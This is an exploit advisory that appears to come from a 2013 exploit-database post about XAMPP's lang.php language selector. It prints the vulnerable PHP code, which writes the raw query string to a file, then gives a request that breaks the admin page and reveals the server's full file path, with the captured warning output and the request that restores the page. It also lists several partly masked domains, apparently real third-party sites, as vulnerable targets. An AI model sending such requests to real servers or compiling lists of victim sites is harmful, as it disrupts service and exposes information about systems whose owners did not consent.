# Exploit Title: Dos And Full Path Disclosure in xampp
# Category:webapps
# Google Dork:?????
# Date: 11-1-2013
# Exploit Author: Dshellnoi Unix
# Vendor Homepage: http://www.apachefriends.org
# Software Link: http://sourceforge.net/projects/xampp/
# Version: 1.5.1, 1.5.4, 1.8.1, 1.8.0,
# Tested on: Windows
#-----------------------------VULNERABIlITY DESCRIPTION------------------------------------#
# The failure occurs by not properly validate data entry in the language chosen by the admin
# The application expects the data input url to redirect to the index of the chosen language
# The data sent in the url is written to the file lang.tmp
#---------------------------------- VULN CODE----------------------------------------------#
<?php
$fp=fopen("lang.tmp","w");
fwrite($fp,basename($_SERVER['QUERY_STRING']));
fclose($fp);
header("Location: index.php");
?>
#--------------------------POC-EXPLOIT-------------------------------#
# Correct request : GET http| https ://domain/xampp/lang.php?en
#
# Exploit request : GET http| https ://domain/xampp/lang.php?KNOCKOUT+BY+EVILCODETEAM
#
#---------------------------OUTPUT---------------------------------------#
Warning: include(lang/KNOCKOUT+BY+EVILCODETEAM.php) [function.include]: failed to open stream: No such file or directory in C:\apachefriends\xampp\htdocs\xampp\index.php on line 13
Warning: include() [function.include]: Failed opening 'lang/KNOCKOUT+BY+EVILCODETEAM.php' for inclusion (include_path='.;C:\apachefriends\xampp\php\pear\') in C:\apachefriends\xampp\htdocs\xampp\index.php on line 13
#-----------------------------DOMAINS POC-----------------------------------------------#
http://simeXp.mic.gov.py/xampp/
http://1X63.22.69.5/xampp/
http://paXul.igl.uni-freiburg.de/xampp/
http://www.suckhoeXvang.vn/xampp/
http://katsXuka.mXine.nu
http://map.mckXonnichiwa.com/xampp
http://soXXu001.com/xampp/
#---------------------------------RESTORE-DOS-------------------------------------------#
GET http| https ://domain/xampp/lang.php?en
#Thanks to :Ivan sanchez, Juan carlos garcia, Luisfer :)